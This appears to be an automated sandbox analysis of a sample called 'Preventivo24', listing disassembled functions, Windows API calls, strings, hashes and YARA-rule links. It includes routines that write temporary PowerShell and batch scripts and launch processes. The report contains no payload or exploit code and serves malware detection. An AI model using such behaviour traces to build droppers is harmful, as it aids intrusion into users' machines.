Similarity

API ID: Variant$Clear$AllocAllocateHeapInitString
String ID: <body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>
API String ID: 1547307772-1571955069
Opcode ID: 97687e3e542eb91556e296f08d0be327abe371a64988ad773479855cd3f066c4
Instruction ID: 9bb2eca2222ee2f54d2bc28bbd281e5f48103b638d29b092c402baaba1360494
Opcode Fuzzy Hash: 97687e3e542eb91556e296f08d0be327abe371a64988ad773479855cd3f066c4
Instruction Fuzzy Hash: 5DA19471904258EFCB14DFA8D944B9EBBB8FF49314F14426AE415F7390EB74AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FFDA40 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 193fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,ps1,ps1,00000003,?,00FD71F8), ref: 00FFDB58
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00FFDB9E
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00FFDBBB
CloseHandle.KERNEL32(00000000), ref: 00FFDBD5
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00FFDC14

Strings

ps1, xrefs: 00FFDAC1, 00FFDAD3, 00FFDADD, 00FFDAEE
Unable to get temp file , xrefs: 00FFDB39
Unable to save script file , xrefs: 00FFDBE4

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$CloseHandleWrite$CreateFindHeapProcessResource
String ID: Unable to get temp file $Unable to save script file $ps1
API String ID: 3201387394-4253966538
Opcode ID: b6c526b177090b973d0c6fbf391aa8e7e782538132b4033abe9f9393d32cfddb
Instruction ID: 00122d0a14ba9455206ae6b90f2ad7a147678b9021068815f179a7722b851842
Opcode Fuzzy Hash: b6c526b177090b973d0c6fbf391aa8e7e782538132b4033abe9f9393d32cfddb
Instruction Fuzzy Hash: 07611431A0060D9BDB15DFA8C945BBEFBB5EF44720F144259EA20B73C1DB749A01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E8ED20 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE38
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE42
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE54
GetExitCodeProcess.KERNEL32(?,?), ref: 00E8EE71
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE7B
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE88
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE92

Strings

"%s" %s, xrefs: 00E8EDC0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
String ID: "%s" %s
API String ID: 3234789809-1070868581
Opcode ID: ec695e0dfa3b245d8889865dc60ed116daf8d5ed0fc885f226ce28dd835bb04a
Instruction ID: 54e5e829d8c1ec0465e2ffafcedcacfe5b5e188c501cde82a420b81bd7e642c9
Opcode Fuzzy Hash: ec695e0dfa3b245d8889865dc60ed116daf8d5ed0fc885f226ce28dd835bb04a
Instruction Fuzzy Hash: 40516D71E04619DFDB24EF64C804BAEB7B5FF48714F20562AE929B7390D730A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB140 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 153libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDefaultLangID.KERNEL32 ref: 00FEB17E
GetUserDefaultLangID.KERNEL32 ref: 00FEB18B
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00FEB19D
GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 00FEB1AB
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00FEB1CE

Strings

GetSystemDefaultUILanguage, xrefs: 00FEB1A5
kernel32.dll, xrefs: 00FEB194
GetUserDefaultUILanguage, xrefs: 00FEB1C8

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressDefaultLangProc$LibraryLoadSystemUser
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
API String ID: 667524283-3528650308
Opcode ID: 7475e9abebc2009a0cbbf484b93088d7a8904f879979841b1d148bf7dfe6eb81
Instruction ID: 482b8cd747651cbd491f4277c14d50aa8383b02513048c0872558e58ec49e999
Opcode Fuzzy Hash: 7475e9abebc2009a0cbbf484b93088d7a8904f879979841b1d148bf7dfe6eb81
Instruction Fuzzy Hash: 1551D270A043518FC759EF2AA49467EB3E2BFE8715F81082EE996C7290DB318844DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00E82C30 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(011D003C,00000000,B5580983,00000000,010F26B3,000000FF,?,B5580983), ref: 00E82DA3
GetLastError.KERNEL32(?,B5580983), ref: 00E82DAD

Strings

VolumeCostVolume, xrefs: 00E82C5D, 00E82D15
VolumeCostAvailable, xrefs: 00E82C70
VolumeCostRequired, xrefs: 00E82C79
VolumeCostDifference, xrefs: 00E82C83
VolumeCostSize, xrefs: 00E82C67
, xrefs: 00E82CFB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: $VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
API String ID: 439134102-2495611297
Opcode ID: 5b04badef6c9e1d6ba05eec62a8f5759fd342ac5f71e6caf84b66bfb17ac49cf
Instruction ID: 554a6dcb9addd08e3083fbe3028eb90837be53adc964c77ba91c79ebedfc6ec5
Opcode Fuzzy Hash: 5b04badef6c9e1d6ba05eec62a8f5759fd342ac5f71e6caf84b66bfb17ac49cf
Instruction Fuzzy Hash: A751D1B1906209DFC728EFA4D90879EBBF4FB08754F10422EE929B7380E7755944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108E310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0108E347
___except_validate_context_record.LIBVCRUNTIME ref: 0108E34F
_ValidateLocalCookies.LIBCMT ref: 0108E3D8
__IsNonwritableInCurrentImage.LIBCMT ref: 0108E403
_ValidateLocalCookies.LIBCMT ref: 0108E458
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108E46E
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0108E483

Strings

csm, xrefs: 0108E3ED

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: ec1cbe1a679631e38f03b1489d34d172569c438e7a04ded65580555abec80192
Instruction ID: bf45747d84de476f217c42bba9e9b6c0188911c50f61a06da11699068d772cd4
Opcode Fuzzy Hash: ec1cbe1a679631e38f03b1489d34d172569c438e7a04ded65580555abec80192
Instruction Fuzzy Hash: 86410530A0820A9BCF10FF6CC884ADE7BF5AF55324F0481A5E9D8AB351DB31E915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01009410 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 373fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100953F
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01009591
ReadFile.KERNEL32(00000000,?,000003FF,?,00000000), ref: 010095D3
ReadFile.KERNEL32(00000000,00000000,000003FF,00000000,00000000,00000000), ref: 0100961E
CloseHandle.KERNEL32(00000000), ref: 010096AE
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01009836

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 010094CF

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$DeleteRead$CloseCreateHandleHeapProcess
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
API String ID: 70679524-3685554107
Opcode ID: 68f2486c0030bdf45d7d8d4bf5adfb4dc1306ed5acdf5e168554314d144d738a
Instruction ID: 414c5a1e6a1f72d2dcc1477d358c924e05affa1257f5d39813966fa52bbd6114
Opcode Fuzzy Hash: 68f2486c0030bdf45d7d8d4bf5adfb4dc1306ed5acdf5e168554314d144d738a
Instruction Fuzzy Hash: ACE17CB1A002189FDB25DB28CC94B9DB7F5AF48314F1441E8EA19A73D2DB34AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2500 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 00FA25FF
CloseHandle.KERNEL32(00000000), ref: 00FA2629
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 00FA266A
CloseHandle.KERNEL32(?), ref: 00FA26DD

Strings

EXE, xrefs: 00FA2556
open, xrefs: 00FA270A
.bat, xrefs: 00FA2551

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CloseFileHandle$CreateWrite
String ID: .bat$EXE$open
API String ID: 3602564925-2898749727
Opcode ID: a568fecd87f2fce9f8b322cb1c1280d456409a28251e119af5ee5ca8a86f9ee1
Instruction ID: a5cd2fba1a24997a3c855e03d14d4b7f7a8459be6207c33fc274ee759dea5ccd
Opcode Fuzzy Hash: a568fecd87f2fce9f8b322cb1c1280d456409a28251e119af5ee5ca8a86f9ee1
Instruction Fuzzy Hash: ECB19B70E00648DFDB14DFA8C958BADBBB5BF49324F148269E425AB381DB74AD46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0100C7F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104libraryloaderCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,80000002,80000002,011D0080), ref: 0100C800
LoadLibraryW.KERNEL32(Shell32.dll,?,80000002,80000002,011D0080), ref: 0100C813
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0100C823
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0100C8B2
SHGetMalloc.SHELL32(?), ref: 0100C8FA

Strings

SHGetSpecialFolderPathW, xrefs: 0100C81D
Shell32.dll, xrefs: 0100C80E

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
String ID: SHGetSpecialFolderPathW$Shell32.dll
API String ID: 2352187698-2988203397
Opcode ID: 44f3f383cd1aa53e3e351f5a8aa00f320bd3b0a9704df7c1ab23bcd149700c73
Instruction ID: 768303dc70add070299b54ebac3c0dc0228bb8bf1a6bb6dc4d4881e8460909a3
Opcode Fuzzy Hash: 44f3f383cd1aa53e3e351f5a8aa00f320bd3b0a9704df7c1ab23bcd149700c73
Instruction Fuzzy Hash: 23313531A007019BFB2AAF28DD05B27BBF5BF84720F4480ACE9C5872D4EB719589C781

Uniqueness

Uniqueness Score: -1.00%

Function 0108A0D8 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0108A282,?,?,?,?), ref: 0108A0FC
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A103

Part of subcall function 0108A1CE: IsProcessorFeaturePresent.KERNEL32(0000000C,0108A0EA,00000000,?,0108A282,?,?,?,?), ref: 0108A1D0

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0108A282,?,?,?,?), ref: 0108A113
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,?,?), ref: 0108A13A
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,?), ref: 0108A14E
InterlockedPopEntrySList.KERNEL32(00000000,?,?,?,?), ref: 0108A161
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?), ref: 0108A174

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: aa30a33cac7087921e4a6f8816f70baeca822c5fe0b09ab2bb97cdfb4b8d573a
Instruction ID: 44d7617d1e2df8f7f289ffdde8d8bf14070ac5fb3382d196f3a2773cbba194cf
Opcode Fuzzy Hash: aa30a33cac7087921e4a6f8816f70baeca822c5fe0b09ab2bb97cdfb4b8d573a
Instruction Fuzzy Hash: 95110B31749712EBEB322A685D48F6BBE99AB447C0F040432FAD1D7784DA20CC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD600 Relevance: 11.0, APIs: 7, Instructions: 467memorysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CreateThread.KERNEL32(00000000,00000000,00ECD750,011476F8,00000000,00000000), ref: 00ECD6BC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00ECD6D5
CloseHandle.KERNEL32(00000000), ref: 00ECD6EB
GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD8C5
HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD8CB
GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD95C
HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD962

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$Free$CloseCreateHandleObjectSingleThreadWait
String ID:
API String ID: 3858748702-0
Opcode ID: 0c2f82f01ae634b620f27e21f10e99f27b2b10b720c06a3ff034b205b17c5db0
Instruction ID: 6ca75d3f7b5607ac2ff84f9c840ae2154a1fef4b7faf978e40e6776cfcc12340
Opcode Fuzzy Hash: 0c2f82f01ae634b620f27e21f10e99f27b2b10b720c06a3ff034b205b17c5db0
Instruction Fuzzy Hash: D5027C71D04209DFDB14DFA4C944BAEBBB8BF48314F10416EE815BB291DB765E46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1010 Relevance: 10.9, APIs: 7, Instructions: 423fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,B5580983,00000000), ref: 00FC117B
ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00FC11ED
ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00FC1499
CloseHandle.KERNEL32(?), ref: 00FC14F7

Part of subcall function 00FC1010: LoadStringW.USER32(000000A1,?,00000514,B5580983), ref: 00FC0F68

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$Read$CloseCreateHandleHeapLoadProcessString
String ID:
API String ID: 2846944389-0
Opcode ID: a4bed7a08e15b2b18980cabbedad458007b478f1eff2dd910e4473d55472ecab
Instruction ID: f76916613beef6e9aef2a0c934f42bcb425786e0c150dc006b28c4fccb678bf2
Opcode Fuzzy Hash: a4bed7a08e15b2b18980cabbedad458007b478f1eff2dd910e4473d55472ecab
Instruction Fuzzy Hash: F7F1C271E00209DBDB24DFA8CA49BAEBBB5FF46314F24421DE815AB381D7749E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA0F00 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 289registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,B5580983), ref: 00EA0FA1
GetLastError.KERNEL32 ref: 00EA0FD8
